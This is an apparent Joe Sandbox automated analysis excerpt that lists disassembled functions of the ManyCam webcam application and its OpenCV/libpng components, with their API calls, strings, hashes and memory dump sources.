Opcode ID: 65827e7e1ba533ac49771d736c66928104eedf98d9c70884fcfb5a62a0082481
Instruction ID: c0cef2afab0bd7fe4f68a4e2e270c34d254ae90ade39b42375e279ad05fcd0b3
Opcode Fuzzy Hash: 65827e7e1ba533ac49771d736c66928104eedf98d9c70884fcfb5a62a0082481
Instruction Fuzzy Hash: 13215EB490410CAFDF04EFA8C894AAEBBB5AF58304F50855EF516E7380DB349A40DBA5

Function 00520C30 Relevance: 7.5, APIs: 5, Instructions: 30synchronizationCOMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C38
LeaveCriticalSection.KERNEL32(?,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C45
SetEvent.KERNEL32(0000000A,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C60
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?), ref: 00520C6C
LeaveCriticalSection.KERNEL32(?,?,?,004BA32E,00000000,?,?,004B95C5,00000000,00000000,?,000000FF,?,00000000,?,?), ref: 00520C76

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: CriticalSection$Leave$EnterEventObjectSingleWait
String ID:
API String ID: 2480823239-0
Opcode ID: 69de553fff6750679b5045ee798069faca8b5646966b91e150a6d47a83d5acfd
Instruction ID: 20fc61db396638aa89e1fa09a044bcff496ff3b65396fda0f4d22a802af35d76
Opcode Fuzzy Hash: 69de553fff6750679b5045ee798069faca8b5646966b91e150a6d47a83d5acfd
Instruction Fuzzy Hash: 12F05E761002109BD320DB19EC4899BF7B8EFE5731B008A1EF66693760C774A84ADB50

Function 00B917E0 Relevance: 7.5, APIs: 5, Instructions: 26COMMON

Download Yara Rule

APIs

AVIStreamRelease.AVIFIL32(?,00B91845), ref: 00B917EC
AVIStreamRelease.AVIFIL32(?,00B91845), ref: 00B917F9
AVIStreamRelease.AVIFIL32(?,00B91845), ref: 00B91805
cvReleaseImage.CXCORE099(?,00B91845), ref: 00B9180E
memset.MSVCR80 ref: 00B91818

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Release$Stream$Imagememset
String ID:
API String ID: 1141295433-0
Opcode ID: 9b10a1fac828d35d3803fb3ec6bc7492a8297132dec4526e2ec142395d89f5c7
Instruction ID: 4e60a1899113ff0d44801672d998536aa7dc509e59040c86a8a8ee8b4f2a8340
Opcode Fuzzy Hash: 9b10a1fac828d35d3803fb3ec6bc7492a8297132dec4526e2ec142395d89f5c7
Instruction Fuzzy Hash: 0EE01260A0061362DE30B6788891F27A2DC9F00B40F550CA97585E6251EF28E9005254

Function 0042C9B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 0042C9E5
_DebugHeapAllocator.LIBCPMTD ref: 0042C9F7

Part of subcall function 0042F960: _invalid_parameter_noinfo.MSVCR80(-0000003E,?,004AB3E0,00000000,0000000A,00000001,7EC02BB4,000000FF,?,004AB79D), ref: 0042F974

Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E198
Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E1D1
Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E203
Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E23C
Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E258
Part of subcall function 0042E150: GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000400), ref: 0042E295
Part of subcall function 0042E150: _DebugHeapAllocator.LIBCPMTD ref: 0042E2A5

Strings

www.manycam.com, xrefs: 0042CADE
www.manycam.com, xrefs: 0042CAF2

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeap$DateFormat_invalid_parameter_noinfo
String ID: www.manycam.com$www.manycam.com
API String ID: 553431348-1145362033
Opcode ID: 907b669c7419f88507c8a825532ba4f2d68d0285e46d80b14031e18f66ef58df
Instruction ID: 55a663fd7b0127f2866d6ce172646f00f7e0cf50757378cb7dafc49b07509b25
Opcode Fuzzy Hash: 907b669c7419f88507c8a825532ba4f2d68d0285e46d80b14031e18f66ef58df
Instruction Fuzzy Hash: 47414271A001199BCB08DB99E891BEEB7B5FF48318F54412EE212B7391DB385944CBA9

Function 00418180 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 91windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,?,0000004E,00000000), ref: 004181E3
SendMessageW.USER32(00000000,?,00000111), ref: 00418234

Part of subcall function 004182A0: GetDlgCtrlID.USER32(?), ref: 004182AD

Part of subcall function 004065F0: GetParent.USER32(?), ref: 004065FD

Strings

open, xrefs: 00418249

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: MessageSend$CtrlParent
String ID: open
API String ID: 1383977212-2758837156
Opcode ID: 01cc08d3ab3f4a93a3031a1c368f21ad3e1f66622c4ad21caec5fa85ffc382d2
Instruction ID: c0f4561a2c49f87f87505e6ad243b5dafbf5b9024aec12e38c733bc4d86155cd
Opcode Fuzzy Hash: 01cc08d3ab3f4a93a3031a1c368f21ad3e1f66622c4ad21caec5fa85ffc382d2
Instruction Fuzzy Hash: FD313E70A042599FEF08DBA5DC51BFEBBB5BF48304F14415DE506B73C2CA38A9418B69

Function 00B95540 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 77COMMON

Download Yara Rule

APIs

memcpy.MSVCR80(?,?,?,75BF3EB0,?,?,00B95D3F,?), ref: 00B955D3
sprintf.MSVCR80 ref: 00B955FD
SetWindowTextA.USER32(?,?), ref: 00B9560F

Strings

%s: %d, xrefs: 00B955F7

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: TextWindowmemcpysprintf
String ID: %s: %d
API String ID: 457325812-423524997
Opcode ID: 1dc2849f7f1626032afb6999546c4c1ab861cf61429b70623d9d30a6caf0e3ef
Instruction ID: 5d2d9598dacc4338e5b5b2b8b6803877c57b341679dd6eaa7ad1a8cbba9f3822
Opcode Fuzzy Hash: 1dc2849f7f1626032afb6999546c4c1ab861cf61429b70623d9d30a6caf0e3ef
Instruction Fuzzy Hash: 33219175108740AFC721CF25D88196BBBF9EF98704B04C9ADE8C987312E735E945DB52

Function 00BCC690 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 76fileCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(?,-80000000,00000001,00000000,00000002,00000001,00000000), ref: 00BCC707
CloseHandle.KERNEL32(00000000), ref: 00BCC73F

Strings

TIFFOpen, xrefs: 00BCC697, 00BCC71A
%s: Cannot open, xrefs: 00BCC715

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: CloseCreateFileHandle
String ID: %s: Cannot open$TIFFOpen
API String ID: 3498533004-4026200435
Opcode ID: 9fa7475f1f8c408cb180f9576db3e9d2d0aa7ccdc6de5f5b94b2e46478c5df03
Instruction ID: 75ce6e9b07683cdfbba1876e67e6f17c8176b9183a54916414889030f92f0e68
Opcode Fuzzy Hash: 9fa7475f1f8c408cb180f9576db3e9d2d0aa7ccdc6de5f5b94b2e46478c5df03
Instruction Fuzzy Hash: 0F1125B67801002BE7242138AD9AF7B0ACAC3E1322F2455BFFA1AD72D2E6688C455161

Function 00438A10 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 65memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004B77A0: fwprintf.MSVCR80 ref: 004B7842
Part of subcall function 004B77A0: fflush.MSVCR80 ref: 004B7852

clock.MSVCR80 ref: 00438AA7
_DebugHeapAllocator.LIBCPMTD ref: 00438AC5

Strings

ob@, xrefs: 00438A20
>>> Entering: %s, xrefs: 00438A91

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: AllocatorDebugHeapclockfflushfwprintf
String ID: >>> Entering: %s$ob@
API String ID: 1338021872-1849792878
Opcode ID: 096be4365fe6ecaff6f57c3d342fa79fd521a6c5a1afd4c32245b02c1f24962e
Instruction ID: e5c4b020fe9bb3bd421ac8dd4bd2dede87d7f0cb66a8b34f549f2a89e30843bb
Opcode Fuzzy Hash: 096be4365fe6ecaff6f57c3d342fa79fd521a6c5a1afd4c32245b02c1f24962e
Instruction Fuzzy Hash: 9D216075900209AFDB04EF94C942AEEBB74FF44718F10852DF816A73C1DB746A04CBA5

Function 00B95E30 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000E5,cvGetTrackbarPos,NULL trackbar or window name,.\window_w32.cpp,0000057F), ref: 00B95E77

Strings

.\window_w32.cpp, xrefs: 00B95E66
NULL trackbar or window name, xrefs: 00B95E6B
cvGetTrackbarPos, xrefs: 00B95E70

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\window_w32.cpp$NULL trackbar or window name$cvGetTrackbarPos
API String ID: 2619118453-2331188912
Opcode ID: 72b58fcac94dba6a742596d0f2b648c30bb499d182e0f4529f793c5707c65d08
Instruction ID: ac55a2b866f9bc443379176e952838765a4a33b21ee8f5653bd29c69528a4ae3
Opcode Fuzzy Hash: 72b58fcac94dba6a742596d0f2b648c30bb499d182e0f4529f793c5707c65d08
Instruction Fuzzy Hash: 79E02B72785E20175D32791D5C4295BA3C8CEC0BB1F1902F6BD28A72E2E311DD0143A5

Function 00B95F10 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 24COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000E5,cvGetWindowHandle,NULL window name,.\window_w32.cpp,000005B9), ref: 00B95F32

Strings

.\window_w32.cpp, xrefs: 00B95F21
NULL window name, xrefs: 00B95F26
cvGetWindowHandle, xrefs: 00B95F2B

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\window_w32.cpp$NULL window name$cvGetWindowHandle
API String ID: 2619118453-2248605415
Opcode ID: a0fc84040701904f43b4eb27a6bbb595c090ec4a2d6525ea1e0da679a0a4ceed
Instruction ID: 2b29df174fbe20589f3e44f2b7d6b58af9ed28c0cf5fc3c3cceaa8ad89c50e88
Opcode Fuzzy Hash: a0fc84040701904f43b4eb27a6bbb595c090ec4a2d6525ea1e0da679a0a4ceed
Instruction Fuzzy Hash: 84E0C2377C82212B9F11650E7C02EDB23C4CBD0BB1B0601F6FA49E72D6E260D80202F4

Function 00B95DE0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 22COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000E5,cvSetMouseCallback,NULL window name,.\window_w32.cpp,00000566), ref: 00B95DFF

Strings

.\window_w32.cpp, xrefs: 00B95DEE
NULL window name, xrefs: 00B95DF3
cvSetMouseCallback, xrefs: 00B95DF8

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\window_w32.cpp$NULL window name$cvSetMouseCallback
API String ID: 2619118453-1583835266
Opcode ID: d048767335b26e22f9f0dcfe9a753bf023ebdc686729dd30eb544e674a04c860
Instruction ID: d38c94edc509e5fe4b630db5f150642e254ab441e946c1d9015146509b7754c8
Opcode Fuzzy Hash: d048767335b26e22f9f0dcfe9a753bf023ebdc686729dd30eb544e674a04c860
Instruction Fuzzy Hash: 1AE086B1A8C7316F8F209F15BC41E5773D09B84760F0646EAF859673E5E270DD408AE9

Function 00B95F50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 21COMMON

Download Yara Rule

APIs

cvError.CXCORE099(000000E5,cvGetWindowName,NULL window,.\window_w32.cpp,000005D0), ref: 00B95F74

Strings

cvGetWindowName, xrefs: 00B95F6D
NULL window, xrefs: 00B95F68
.\window_w32.cpp, xrefs: 00B95F63

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Error
String ID: .\window_w32.cpp$NULL window$cvGetWindowName
API String ID: 2619118453-2260663865
Opcode ID: 308c5ad3d087a95af16c6c6302e071c55e8ccf33de389318d4eda3db4e0bb752
Instruction ID: 2657d0170c1c349fcc6fa6b5d5a3f9ae7d4aa953fce7460fbbe5b3d9d68dc49d
Opcode Fuzzy Hash: 308c5ad3d087a95af16c6c6302e071c55e8ccf33de389318d4eda3db4e0bb752
Instruction Fuzzy Hash: FED05B717882513A5E10661D7C02FD656CCCB44F71F4605F6F549E63F2F650EC00469D

Function 00BB4890 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 341COMMON

Download Yara Rule

APIs

sprintf.MSVCR80 ref: 00BB48BC

Strings

png_do_dither returned rowbytes=0, xrefs: 00BB4B11
NULL row buffer for row %ld, pass %d, xrefs: 00BB48B6
png_do_rgb_to_gray found nongray pixel, xrefs: 00BB49A7, 00BB49BE

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: sprintf
String ID: NULL row buffer for row %ld, pass %d$png_do_dither returned rowbytes=0$png_do_rgb_to_gray found nongray pixel
API String ID: 590974362-2735929073
Opcode ID: fc4858867437b85e1b3b4d14673a4cc97ed7bf3532f4049da0ba6a59cb1c2a6e
Instruction ID: c155a1adaf940811f3365b0854e8fe5714f6b3876c794b8f12b962f42b3aaeee
Opcode Fuzzy Hash: fc4858867437b85e1b3b4d14673a4cc97ed7bf3532f4049da0ba6a59cb1c2a6e
Instruction Fuzzy Hash: 3AD13B75500B409BE72ADA34C885BF7B7E8FF55308F04894CE9EB42252EBB1B946C760

Function 00418380 Relevance: 6.3, APIs: 4, Instructions: 316windowCOMMON

Download Yara Rule

APIs

GetFocus.USER32 ref: 004186F4

Part of subcall function 00408360: lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004083C6
Part of subcall function 00408360: CompareStringW.KERNEL32(00000400,00000001,?,00000003,<A>,00000003), ref: 00408424
Part of subcall function 00408360: CompareStringW.KERNEL32(00000400,00000001,?,00000004,</A>,00000004), ref: 00408474

Part of subcall function 004078E0: GetClientRect.USER32(?,00000000), ref: 004078F1

Part of subcall function 00418A60: SetBkMode.GDI32(?,00000001), ref: 00418A71

Part of subcall function 00418A40: SelectObject.GDI32(?,?), ref: 00418A51

GetSysColor.USER32(00000011), ref: 004184AA

Part of subcall function 00418810: DeleteDC.GDI32(00000000), ref: 00418824

GetFocus.USER32 ref: 0041858A

Part of subcall function 00418AF0: DrawTextW.USER32(00000000,?,00000000,?,000000FF), ref: 00418B0D

Memory Dump Source

Source File: 00000001.00000002.1715327160.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1715309277.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715588272.000000000053B000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715634819.0000000000595000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715656830.000000000059B000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715678398.000000000059C000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000001.00000002.1715700837.00000000005A4000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_ManyCam.jbxd

Similarity

API ID: CompareFocusString$ClientColorDeleteDrawModeObjectRectSelectTextlstrlen
String ID:
API String ID: 1926319676-0
Opcode ID: 26e55d2ddd3d839f70efe0ddea58adb9d72dd7b4482a26fa95ec74e06393aeaf
Instruction ID: 8fd3581a3690b51667abaed722c69e7692ca1fee28cda492897b23429118541a
Opcode Fuzzy Hash: 26e55d2ddd3d839f70efe0ddea58adb9d72dd7b4482a26fa95ec74e06393aeaf
Instruction Fuzzy Hash: DCD1FA719002089FDB08DF95C891AEEBBB5FF48344F14811EE5166B392DF39A985CF94

Function 00B92660 Relevance: 6.1, APIs: 4, Instructions: 131windowCOMMON

Download Yara Rule

APIs

cvGetImageROI.CXCORE099(?,?), ref: 00B926C7
SetStretchBltMode.GDI32(?,00000003), ref: 00B9275A
?Bpp@CvvImage@@QAEHXZ.HIGHGUI099(?), ref: 00B92769
StretchDIBits.GDI32(?,?,?,?,?,?,?,?,?,00000000,?,00000000,00CC0020), ref: 00B927BA

Memory Dump Source

Source File: 00000001.00000002.1715789441.0000000000B91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00B90000, based on PE: true

Associated: 00000001.00000002.1715768409.0000000000B90000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715833413.0000000000BDD000.00000002.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715858991.0000000000BE6000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715873821.0000000000BE7000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715889470.0000000000BEA000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715904820.0000000000BEB000.00000008.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715920506.0000000000BEC000.00000004.00000001.01000000.0000000F.sdmpDownload File
Associated: 00000001.00000002.1715936608.0000000000BEE000.00000002.00000001.01000000.0000000F.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b90000_ManyCam.jbxd

Similarity

API ID: Stretch$BitsBpp@ImageImage@@Mode
String ID:
API String ID: 903276727-0
Opcode ID: eaed336cc03e6299236130fb3d09c1137e5752df490cb6fef800b920e2ec2e57
Instruction ID: d33e4b584b8a5fcd6e8124d373eaa555f33c95320f3ebaca0963d1eb6e5ccf4a
Opcode Fuzzy Hash: eaed336cc03e6299236130fb3d09c1137e5752df490cb6fef800b920e2ec2e57
Instruction Fuzzy Hash: ED41F1B5608200AFC714DF58C880D2BB7E9EB88714F158A6DF69997361D730ED05CBA6

Function 005128B0 Relevance: 6.1, APIs: 4, Instructions: 129memoryCOMMON

Download Yara Rule

APIs

_DebugHeapAllocator.LIBCPMTD ref: 005128FB
_DebugHeapAllocator.LIBCPMTD ref: 0051292B
_DebugHeapAllocator.LIBCPMTD ref: 00512953
